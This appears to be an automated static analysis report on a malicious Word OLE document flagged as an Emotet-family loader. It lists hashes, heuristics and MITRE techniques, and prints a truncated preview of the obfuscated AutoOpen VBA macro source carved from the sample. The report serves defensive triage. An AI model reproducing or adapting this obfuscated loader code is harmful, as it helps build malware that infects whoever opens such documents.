Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 fced990511a17c3f…

MALICIOUS

Office (OLE)

Size: 262.0 KB
Created: 2018-03-28 14:57:00
Authoring application: Microsoft Office Word
First seen: 2018-04-12
MD5: 97853fa0ae974ac9f2e9cafea07ae6a4
SHA-1: b5767e90c1fd322654f51342d7aca51e98148c28
SHA-256: fced990511a17c3f62b727328898e572279f537a60b403d9e93eb7d6841a3d88
Risk Score: 244

Malware Insights

MITRE ATT&CK
  • T1059.005 Visual Basic
  • T1566.001 Spearphishing Attachment

The file contains multiple high-severity heuristics indicating the presence of malicious VBA macros, including AutoOpen and CreateObject calls. The ClamAV detection 'Doc.Malware.Emodldr-10025032-0' further supports its malicious nature. The extracted VBA macro, while heavily obfuscated, likely attempts to download and execute a secondary payload, a common technique for Emodldr malware families.

Heuristics (9)

  • ClamAV: Doc.Malware.Emodldr-10025032-0 (critical; CLAMAV_DETECTION)
    ClamAV detected this file as malware: Doc.Malware.Emodldr-10025032-0
  • VBA macros detected (medium; 3 related findings; OLE_VBA_MACROS)
    Document contains VBA macro code
  • AutoOpen macro (high; OLE_VBA_AUTOOPEN)
    AutoOpen macro
  • CreateObject call (high; OLE_VBA_CREATEOBJ)
    CreateObject call
  • VBA p-code auto-exec with execution tokens (high; OLE_VBA_PCODE_AUTOEXEC_EXEC)
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker (medium; OLE_LEGACY_WORDBASIC_AUTOEXEC)
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Excel 4.0 (XLM) macro sheet present (medium; OLE_XLM_AUTOOPEN)
    Workbook contains an Excel 4.0 macro sheet sub-stream — XLM is rarely seen in modern legitimate workbooks and was a major Office malware vector during 2020-2022.
  • Suspicious extracted artifact (info; EXTRACTED_FILE_STATIC_TRIAGE)
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
  • Embedded URL (info; EMBEDDED_URL)
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 60000 bytes
SHA-256: c7a65584834e0646d2a0636b0cfcbf86a6d6bd6603e5c36dc793723bbdb49c86
Detection
ClamAV: No threats found
Obfuscation or payload: likely
Carved artifact contains 27 long base64-like blob(s).
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "VAAJMqqPZCkr"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "HjULHrXSYQin"
Function murifMX()
On Error Resume Next
Select Case uoDzq
      Case 32844
         QZqwd = CStr(NwidGq + CStr(96167) - arQoHQ * 21858)
      Case 88591
         iYtbQ = CjDdii
         mdmltK = Tan(33008 * MjYiU)
End Select
zjFIGlQds = CGUfo("%iolQA2AGQAMZ%So9", 5, 8)
Select Case mKjAIW
      Case 26843
         YjGzU = CStr(zCMTDt + CStr(9778) - BVXBcq * 43809)
      Case 79485
         wwjPV = cVLTi
         Diwpo = Tan(45527 * WEbar)
End Select
Select Case JWfKL
      Case 44917
         fJmUWz = CStr(kwTLs + CStr(44209) - rfPBf * 62017)
      Case 1297
         XIXmD = AWkuj
         loCKcz = Tan(26315 * nPPlIH)
End Select
VzFVq = CGUfo("vvF1AyAGMAYgBmAD%@Ji", 5, 12)
Select Case qPJjr
      Case 70155
         lizkvB = CStr(ZjRLkU + CStr(5223) - FYiSJP * 16225)
      Case 85775
         dwiJGb = pBICY
         rBMGN = Tan(61916 * ZXnPNK)
End Select
Select Case iMWHEz
      Case 19203
         jCodn = CStr(wDlYvD + CStr(68857) - tCXGH * 94864)
      Case 64884
         pqcHl = ADwro
         Kzptin = Tan(13632 * iBWnM)
End Select
qovSnmNzEE = CGUfo("tjhUO4DgAZQAyAGUAOQA2AGYANgA5AKz", 7, 24)
Select Case TUjzs
      Case 24338
         TMwBfO = CStr(CicEOz + CStr(1278) - MicTqd * 66650)
      Case 78638
         ovRmj = zzbCq
         rrwZOA = Tan(92242 * RYNTX)
End Select
Select Case QRSwF
      Case 38957
         dSpAnz = CStr(zKVHFj + CStr(66371) - fRjiz * 67093)
      Case 9984
         FRbJa = cdtnn
         jIqKB = Tan(20588 * WiwqaZ)
End Select
mvcLUBEmclF = CGUfo("kTb6DKAA3ADQAMQAzAGMAZgAzAGMAYgA4ADMAOQA3ADMAZABiADAANwAzADUAMABiADYAMgBjADEANAA1ADUAOQA0AGUAMwAzADYAOABmAGIAMABhAGYAZAA2ADkAMwBlAGMAMwAwAGc1d", 7, 133)
Select Case mARWX
      Case 11564
         BkjLn = CStr(kirOS + CStr(91485) - cXbWj * 73997)
      Case 3964
         lIaBkV = bLWQhu
         YGwNww = Tan(76550 * iYiJbO)
End Select
Select Case YkIlU
      Case 27343
         ijGmMv = CStr(uJkjJB + CStr(90550) - BjGmcq * 62596)
      Case 99264
         WDNfmP = djXSa
         qlDEVB = Tan(72424 * IcHhi)
End Select
jiwib = CGUfo("aw3hFUazAGEANQBkAGQAMABiADgAMgBmAGQAOQc@", 8, 31)
Select Case ihlCCj
      Case 48031
         JhUHu = CStr(CddcQU + CStr(80695) - iYVfN * 57012)
      Case 27698
         GwDnfv = UQtHac
         kNGKA = Tan(59599 * iQOlKz)
End Select
Select Case SawYni
      Case 73855
         JnofDK = CStr(MuLtH + CStr(81003) - Ytvojw * 33470)
      Case 98658
         AjUTwb = bjfQq
         bZXzr = Tan(20793 * kGiHX)
End Select
ODwTfswA = CGUfo("aoQ41gA0AGIAZQA1ADYAOAAyADIAYwAwAGIANwAxADYAYwAyADkAMwBmADYANQA1AGQANwAyADcAMwAxAGQANgA0ADkAMwAwAGEAYQA4ADgAYgA5AGUAMAA0AGIAOQA2ADkAMwBnOE", 6, 130)
Select Case Edzzp
      Case 44129
         pnwiq = CStr(lUjJb + CStr(49592) - XSVRj * 10184)
      Case 12684
         MuzNww = wckqt
         LnaoJh = Tan(49195 * BzHhT)
End Select
Select Case ckWIMD
      Case 42978
         SZTihz = CStr(cofttl + CStr(34529) - OivZfv * 62203)
      Case 37701
         zVqXpz = JMTzXq
         kvBHZ = Tan(48173 * JoKlHi)
End Select
iZWAuSWTW = CGUfo("MbcA9AHwAOQAxADIANQBkADUAMQA1AGEAYQBmADkANgBjADMAYgAwAGUAZAAxADQAMwAxADQANwAxADIAZQBiADgAMABjAGEAMQBhAGQAMwAwADkAYwA5AGQAZQAwAGIANwA0ADIAOQA4AGEAOABiADUAMAA2ADYAZAA0AGQAMQBiAGIANOnB", 4, 175)
Select Case dqzlF
      Case 54647
         LIFnqB = CStr(jSSbXT + CStr(21350) - ioGuFo * 63845)
      Case 62685
         hSNjWW = ROdYn
         TiXBcV = Tan(83535 * kKFzM)
End Select
Select Case RGriG
      Case 12131
         pGsmD = CStr(WooYjY + CStr(54263) - ZCbZh * 10515)
      Case 91479
         bSpOw = NbiXi
         wMpjiS = Tan(74001 * swTKuk)
End Select
VupDDYzFkiH = CGUfo("JukUUAYQAzAGQANwAyAGIAMgAwADQAOAA5AGUAYgBjAGEAMABhAGIAMwA5ADA
... (truncated)